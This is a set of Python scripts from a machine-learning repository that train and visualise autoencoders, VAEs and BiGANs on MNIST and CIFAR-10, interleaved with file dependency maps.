plt.plot(num_unlabelled, classifier_pretrained_acc, '-o', num_unlabelled, classifier_random_acc, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['BiGAN Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.savefig('cifar10_pretrained_fully_sup_compar.png') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,492 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py | from keras.optimizers import Adam
import numpy as np
from cifar10_models import deterministic_encoder_model, generator_model, bigan_discriminator_model
from common_models.common_models import bigan_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import save_imgs, plot_gan_batch_loss, plot_gan_epoch_loss, plot_discriminator_acc, save_reconstructions
from functions.data_funcs import get_cifar10
# Set random seed
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_bigan_determ'
model_path = 'Models/cifar10_bigan_determ'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
# =====================================
# Instantiate models
# =====================================
# Instantiate models
generator = generator_model()
encoder = deterministic_encoder_model()
discriminator = bigan_discriminator_model()
# Specify optimizer
lr = 1e-4
beta_1 = 0.5
beta_2 = 0.999
opt_d = Adam(lr=lr, beta_1=beta_1, beta_2=beta_2)
opt_g = Adam(lr=lr, beta_1=beta_1, beta_2=beta_2)
# Freeze generator and encoder while discriminator is changed
generator.trainable = False
encoder.trainable = False
bigan_discriminator = bigan_model(generator, encoder, discriminator, latent_dim, img_shape)
bigan_discriminator.compile(optimizer=opt_d, loss='binary_crossentropy')
# Freeze discriminator while generator and encoder are trained
generator.trainable = True
encoder.trainable = True
discriminator.trainable = False
bigan_generator = bigan_model(generator, encoder, discriminator, latent_dim, img_shape)
bigan_generator.compile(optimizer=opt_g, loss='binary_crossentropy')
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 1000
batch_size = 100
# Training settings
num_batches = int(X_train.shape[0] / batch_size)
epoch_save_interval = 10
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
d_acc = 0
# Shuffle training set
new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[new_permutation]
# Train on all batches
for batch in range(num_batches):
# Select next batch of images from training set
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
# Generator normal distributed latent vector
z = np.random.normal(size=(batch_size, latent_dim))
# Create labels for discriminator inputs
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
# Train the discriminator (img -> z is valid, z -> img is fake)
d_loss = bigan_discriminator.train_on_batch([z, imgs], [fake, valid])
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
d_acc += d_loss[1]
# ----------------------------
# Train Generator and Encoder
# ----------------------------
# Train the generator (z -> img_ is valid and img -> z_ is is invalid)
ge_loss = bigan_generator.train_on_batch([z, imgs], [valid, fake])
g_batch_loss_trajectory[epoch * num_batches + batch] = ge_loss[0]
g_epoch_loss_sum += ge_loss[0]
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
d_loss[0], 100 * d_loss[1],
ge_loss[0]))
# Get epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
z = np.random.normal(size=(25, latent_dim))
gen_imgs = generator.predict(z)
save_imgs(image_path, gen_imgs, epoch, img_rows, img_cols, channels, color=True)
# Save models to file
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualize results
# =====================================
# Save reconstructions
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Plot loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory)
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,493 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_dae_train.py | import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from functions.auxiliary_funcs import save_models
from functions.data_funcs import get_cifar10
from functions.visualization_funcs import save_reconstructions, plot_train_accuracy, plot_train_loss
from cifar10_models import deterministic_encoder_model, generator_model, autoencoder_model
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
image_path = 'Images/cifar10_dae'
model_path = 'Models/cifar10_dae'
# =====================================
# Load dataset
# =====================================
(X_train, _), (X_test, y_test) = get_cifar10()
# Corrupt data with noise
noise_factor = 0.5
X_train_noisy = X_train + noise_factor * np.random.normal(0., 1, size=X_train.shape)
X_test_noisy = X_test + noise_factor * np.random.normal(0., 1, size=X_test.shape)
X_train_noisy = np.clip(X_train_noisy, 0., 1.)
X_test_noisy = np.clip(X_test_noisy, 0., 1.)
# =====================================
# Instantiate and compile models
# =====================================
encoder = deterministic_encoder_model()
generator = generator_model()
generator.load_weights('cifar10_gan_generator')
autoencoder = autoencoder_model(encoder, generator)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
# =====================================
# Train models
# =====================================
# Specify hyper-parameters for training
epochs = 100
batch_size = 128
patience = 5
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(model_path + '.h5', monitor='val_loss', verbose=1, save_best_only=True, mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = autoencoder.fit(X_train_noisy, X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
validation_split=0.1,
callbacks=callbacks,
verbose=1)
# Replace current encoder and decoder models with that from the best save autoencoder
encoder = deterministic_encoder_model()
decoder = generator_model()
autoencoder = autoencoder_model(encoder, decoder)
autoencoder.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=True)
# Plot loss curves
plot_train_loss(image_path, history)
plot_train_accuracy(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,494 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_ls_interpolations.py | import numpy as np
from random import randint
from keras.datasets import mnist
from mnist_mlp_models import encoder_model, generator_model, vae_encoder_model
from common_models.common_models import vae_encoder_sampling_model
import matplotlib.pyplot as plt
from functions.data_funcs import get_mnist
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
num_steps = 7
# =====================================
# Load data
# =====================================
# Load dataset
(_, _), (x_test_gan, y_test) = get_mnist(gan=True)
(_, _), (x_test_ae, _) = get_mnist()
# =====================================
# Interpolate
# =====================================
model_names = ('basic_ae', 'dae', 'sae', 'vae', 'aae', 'lr', 'jlr', 'bigan', 'posthoc_bigan')
for i, model_name in enumerate(model_names):
gan = False
if i > 4:
gan = True
if gan is True:
x_test = x_test_gan
else:
x_test = x_test_ae
image_path = 'Images/mnist_' + model_name + '_ls_interpolations'
encoder_path = 'Models/mnist_' + model_name + '_encoder.h5'
generator_path = 'Models/mnist_' + model_name + '_generator.h5'
if model_name == 'vae':
vae_encoder = vae_encoder_model()
encoder = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, epsilon_std=0.05)
else:
encoder = encoder_model()
encoder.load_weights(encoder_path)
generator = generator_model(gan=gan)
if model_name == 'lr':
generator.load_weights('Models/mnist_gan_generator.h5')
elif model_name == 'posthoc_bigan':
generator.load_weights('Models/mnist_gan_generator.h5')
else:
generator.load_weights(generator_path)
# Get sets of just 1 and 9 digits
x_test_7 = x_test[y_test == 7]
x_test_5 = x_test[y_test == 5]
# Create micro batch
X = np.array([x_test_7[8], x_test_5[7]])
# Compute latent space projection
latent_x = encoder.predict(X)
latent_start, latent_end = latent_x
# Get original image for comparison
start_image, end_image = X
vectors = []
normal_images = []
# Linear interpolation
alpha_values = np.linspace(0, 1, num_steps)
for alpha in alpha_values:
# Latent space interpolation
vector = latent_start * (1 - alpha) + latent_end * alpha
vectors.append(vector)
# Image space interpolation
blend_image = (1 - alpha) * start_image + alpha * end_image
normal_images.append(blend_image)
# Decode latent space vectors
vectors = np.array(vectors)
reconstructions = generator.predict(vectors)
if gan is True:
reconstructions = 0.5 * reconstructions + 0.5
reconstructions *= 255
# Convert pixel-space images for use in plotting
normal_images = np.array(normal_images)
# Plot interpolations
plt.figure()
n = len(reconstructions)
for i in range(n):
# Display interpolation in pixel-space
ax = plt.subplot(2, n, i + 1)
plt.imshow(normal_images[i].reshape(img_rows, img_cols))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# Display interpolation in latent space
ax = plt.subplot(2, n, i + 1 + n)
plt.imshow(reconstructions[i].reshape(img_rows, img_cols))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.savefig(image_path) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,495 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_plot_recons.py | import numpy as np
import matplotlib.pyplot as plt
from cifar10_models import deterministic_encoder_model, generator_model, vae_encoder_model
from common_models.common_models import vae_encoder_sampling_model
from functions.data_funcs import get_cifar10
import matplotlib.gridspec as gridspec
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
channels = 3
img_shape = (img_rows, img_cols, channels)
latent_dim = 64
num_classes = 10
num_recons_per_class = 10
# =====================================
# Load dataset
# =====================================
# Load CIFAR-10 data in range [-1,1]
(X_train, _), (X_test, y_test) = get_cifar10()
# Get initial data examples to train on
classes = np.arange(num_classes)
test_digit_indices = np.empty(0)
# =====================================
# Choose examples from test set
# =====================================
# test set to contain set number of labels for each class
for class_index in range(num_classes):
# Generate training set with even class distribution over all labels
indices = [i for i, y in enumerate(y_test) if y == classes[class_index]]
indices = np.asarray(indices)
indices = indices[0:num_recons_per_class]
test_digit_indices = np.concatenate((test_digit_indices, indices))
test_digit_indices = test_digit_indices.astype(np.int)
# Generate test and reconstructed digit arrays
X_test = X_test[test_digit_indices]
# =====================================
# Plot test examples
# =====================================
num_rows = num_recons_per_class
num_cols = num_classes
plt.figure(figsize=(num_rows, num_cols))
gs = gridspec.GridSpec(num_rows, num_cols, width_ratios=[1,1,1,1,1,1,1,1,1,1],
wspace=0., hspace=0., top=0.8, bottom=0.2, left=0.2, right=0.8)
for i in range(num_rows):
for j in range(num_cols):
im = X_test[i*num_rows + j].reshape(img_shape)
ax = plt.subplot(gs[i,j])
plt.imshow(im)
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.savefig('cifar10_test_examples')
# =====================================
# Plot model reconstructions
# =====================================
generator = generator_model()
for model in ('basic_ae', 'dae', 'aae', 'bigan_determ', 'vae'):
if model == 'vae':
vae_encoder = vae_encoder_model()
encoder = vae_encoder_sampling_model(vae_encoder, latent_dim, img_shape, epsilon_std=0.05)
else:
encoder = deterministic_encoder_model()
encoder.load_weights('Models/cifar10_' + model + '_encoder.h5')
generator.load_weights('Models/cifar10_' + model + '_generator.h5')
recon_x = generator.predict(encoder.predict(X_test))
num_rows = num_classes
num_cols = num_recons_per_class
plt.figure(figsize=(num_rows, num_cols))
gs = gridspec.GridSpec(num_rows, num_cols, width_ratios=num_recons_per_class*[1],
wspace=0., hspace=0., top=0.8, bottom=0.2, left=0.2, right=0.8)
for i in range(num_rows):
for j in range(num_cols):
im = recon_x[i * num_rows + j].reshape(img_rows, img_cols, channels)
ax = plt.subplot(gs[i, j])
plt.imshow(im)
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.savefig('Images/cifar10_' + model + '_recons.png')
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,496 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_mlp_models.py | from keras.layers import Input, Dense, Reshape, Flatten, Dropout, BatchNormalization, Activation, concatenate, Lambda
from keras.layers.advanced_activations import LeakyReLU
from keras.models import Sequential, Model
from keras.regularizers import l1
from keras import backend as K
import numpy as np
# Define constants
img_rows = 28
img_cols = 28
channels = 1
